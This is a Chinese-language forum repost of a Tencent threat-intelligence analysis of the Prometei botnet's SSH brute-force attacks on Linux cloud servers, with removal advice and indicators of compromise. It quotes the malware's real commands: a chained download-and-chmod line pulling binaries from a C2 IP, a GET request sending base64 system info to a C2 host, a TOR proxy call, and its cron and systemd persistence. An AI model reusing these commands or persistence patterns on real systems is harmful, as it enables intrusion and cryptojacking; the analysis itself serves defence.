查看: 11653|回复: 0
收起左侧

[技术原创] 腾讯主机安全(云镜)检测到Prometei僵尸网络针对云服务器的攻击

[复制链接]
腾讯电脑管家
发表于 2020-12-14 23:16:20 | 显示全部楼层 |阅读模式
本帖最后由 腾讯电脑管家 于 2020-12-14 23:18 编辑

一、概述
腾讯主机安全(云镜)检测到Prometei僵尸网络针对云服务器的攻击行动。该僵尸网络于20207月被发现,初期主要以SMB、WMI弱口令爆破SMB漏洞(如永恒之蓝漏洞)对Windows系统进行攻击传播

腾讯安全威胁情报中心发现该僵尸网络于2020123日启用了针对Linux系统的攻击,此次攻击行动通过SSH弱口令爆破登陆服务器,然后安装僵尸木马/usr/sbin/uplugplay,uplugplay,再通过安装定时任务和系统服务进行持久化。从而持续与C2服务器通信,并尝试根据C2指令启动挖矿程序。
腾讯安全专家建议企业用户按照以下方式对服务器进行检查并删除相关项,同时修改SSH认证方式为强密码。

文件
/usr/sbin/uplugplay
/etc/uplugplay
/etc/CommId

进程
./uplugplay
sh -c /usr/sbin/uplugplay -Dcomsvc
/usr/sbin/uplugplay -Dcomsvc

定时任务:
@reboot /usr/sbin/uplugplay -cron

系统服务:
/etc/systemd/system/multi-user.target.wants/uplugplay.service -> /usr/lib/systemd/system/uplugplay.service

腾讯安全系列产品应对Prometei僵尸网络的响应清单:




二、详细分析
Prometei僵尸网络病毒通过SSH(22端口)Root账号弱口令爆破入侵,然后下载脚本upnpsetup进行安装:
bash -c sudo /tmp/upnpsetup

接着清除安装文件:
bash -c cat /etc/os-release&cat /etc/redhat-release&rm /tmp/upnpsetup&rm ./upnpsetup

安装脚本释放核心木马文件:/usr/sbin/uplugplay
Uplugplay将自身安装为systemd服务随系统启动:
/etc/systemd/system/multi-user.target.wants/uplugplay.service -> /usr/lib/systemd/system/uplugplay.service

服务描述:
[Unit]
Description=UPlugPlay
After=multi-user.target

[Service]
Type=forking
ExecStart=/usr/sbin/uplugplay

[Install]
WantedBy=multi-user.target
Uplugplay将自身安装为cron定时任务,在开机时运行:
@reboot /usr/sbin/uplugplay -cron
木马上线后首先向服务器请求命令,服务器返回“sysinfo”,即让受控机上传系统信息。


与C2服务器的通信可通过HTTP进行,命令和命令执行结果使用被感染计算机上生成的密钥使用RC4加密进行传输。RC4密钥通过HTTP共享,通过保存在僵尸木马的数据块中的公共密钥进行加密,然后经过base64编码字符串后保存在enckey参数中。
GET i-bin/prometei.cgi?add=aW5mbyB7DQp2Mi44NlhfVW5peDY0DQprYWxpLTAwMQ0KDQoxeCBJbnRlbChSKSBDb3JlKFRNKSBpNy00NzkwIENQVSBAIDMuNjBHSHoNCg0KSW50ZWwgQ29ycG9yYXRpb24NCjQ0MEJYIERlc2t0b3AgUmVmZXJlbmNlIFBsYXRmb3JtDQoNCg0KS2FsaSBHTlUvTGludXggUm9sbGluZyAmIDIwMTguMiANCg0KL3Vzci9zYmluLw0KIDE1OjU0OjEwIHVwIDQ3IG1pbiwgIDEgdXNlciwgIGxvYWQgYXZlcmFnZTogMC41NiwgMC4zMiwgMC4yNg0KTGludXgga2FsaS0wMDEgNC4xNS4wLWthbGkyLWFtZDY0ICMxIFNNUCBEZWJpYW4gNC4xNS4xMS0xa2FsaTEgKDIwMTgtMDMtMjEpIHg4Nl82NCBHTlUvTGludXgNCn0NCg__&i=607QY1J44NY88E14&h=kali-001&enckey=F5mGmixSHYDjcbmAJfOmEXB76jhOuJma/mH6rLvvDgqAscm+TJxiD79QBabODgF868YiMCDR0oIK4k7mdIg/yUY63Ax1Gpsuk2qFvK0kmNLjNbFFzRkDzKlfwvkzUIZMDDfYooUqBcDyL06TjzYOAQoGkrgm60CKqeQFyeR4bpE= HTTP/1.0
Host: p1.feefreepool.net

请求回传感染用户机器信息,相关信息被base64编码后附加在参数add中,包括操作系统版本、用户名、CPU类型、CPU频率、木马所在路径、木马启动时间,格式如下:
info {
v2.86X_Unix64
kali-001

1x Intel(R) Core(TM) i7-4790 CPU @ 3.60GHz

Intel Corporation
440BX Desktop Reference Platform

Kali GNU/Linux Rolling & 2018.2

/usr/sbin/
15:54:10 up 47 min,  1 user,  load average: 0.56, 0.32, 0.26
Linux kali-001 4.15.0-kali2-amd64 #1 SMP Debian 4.15.11-1kali1 (2018-03-21) x86_64 GNU/Linux
}
之后僵尸木马程序进入接收C2服务器的指令并执行的循环中,支持以下功能的执行,对感染机器进行远程控制:
exec:执行一个程序
sysinfo:查询被感染系统的机器信息
quit:退出僵尸木马进程
quit2:退出僵尸木马处理命令循环,不退出进程
touch:修改文件一个字节,从而改变检验值和生成时间
set_cc0/set_cc1:设置一个新的C2服务地址
extip:获取僵尸网络外部的IP地址
xwget:下载文件,并将文件每个字节通过XOR运算
wget:下载文件
start_mining:启动挖矿程序
stop_mining:停止挖矿程序
updatev4:下载更新僵尸木马

僵尸木马与C2服务器的通信命令如下:
sh -c /usr/sbin/uplugplay -chkxwget http://178.32.52.248/dwn.php?d=t-msdtc /usr/sbin/msdtc 25F83D54776B4D623B327DA96A8873C60B8E834D7E3A26CCA0461C9C6B66642E&&chmod +x /usr/sbin/msdtc&&/usr/sbin/uplugplay -chkxwget http://178.32.52.248/dwn.php?d=t-smcard /usr/sbin/smcard 2D2CDFBA7C1BF259DAE72440BE8AF09F13F2465E99CC7B655383034CC5E79924&&chmod +x /usr/sbin/smcard&&/usr/sbin/uplugplay -chkxwget http://178.32.52.248/dwn.php?d=t-libssl /usr/lib/libssl.so.1.1 16BC51330FE980C40505EBC871EF264A6FB9A2236EA06E184AFDF2022AA2A207&&chmod +x /usr/lib/libssl.so.1.1&&/usr/sbin/uplugplay -chkxwget http://178.32.52.248/dwn.php?d=t-libevent /usr/lib/libevent-2.1.so.7 D0EB44092124BD424C0668BC02204580D7676AD74847B744418A4F1E0C683FC9&&chmod +x /usr/lib/libevent-2.1.so.7&&/usr/sbin/uplugplay -chkxwget http://178.32.52.248/dwn.php?d=t-libcrypto /usr/lib/libcrypto.so.1.1 2501FD4111DACA1FA7CD011582246753D13AF23C03F291DE6C972FA8256ECFFC&&chmod +x /usr/lib/libcrypto.so.1.1
与C2服务器的通信直接通过HTTP,TOR代{过}{滤}理进行,可能还存在名为smcard、libssl、libevent、libcrypto的代{过}{滤}理方式。其中使用的/usr/sbin/msdtc文件主要目的是通过TOR将请求代{过}{滤}理到C2服务器https[:]//gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi。
执行代{过}{滤}理请求命令:
/usr/sbin/msdtc aHR0cHM6Ly9nYjduaTVyZ2VleGRjbmNqLm9uaW9uL2NnaS1iaW4vcHJvbWV0ZWkuY2dpP3I9NSZpPU82RU00UUNPNTAzNlRSQzQ=
Base64解码命令:


I
OCs
IP
178.32.52.248
Md5
Uplugplay
ed3532ffbcfd91585568635eb6d4a655
Domain
mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p
gb7ni5rgeexdcncj.onion
p1.feefreepool.net
dummy.zero
C2
p1.feefreepool.net
URL
http[:]//178.32.52.248/dwn.php
http[:]//mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi
https[:]//gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi                                    
http[:]//p1.feefreepool.net/cgi-bin/prometei.cgi                                          
http[:]//dummy.zero/cgi-bin/prometei.cgi


参考链接:
https://blog.talosintelligence.com/2020/07/prometei-botnet-and-its-quest-for-monero.html


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-22 12:06 , Processed in 0.352932 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表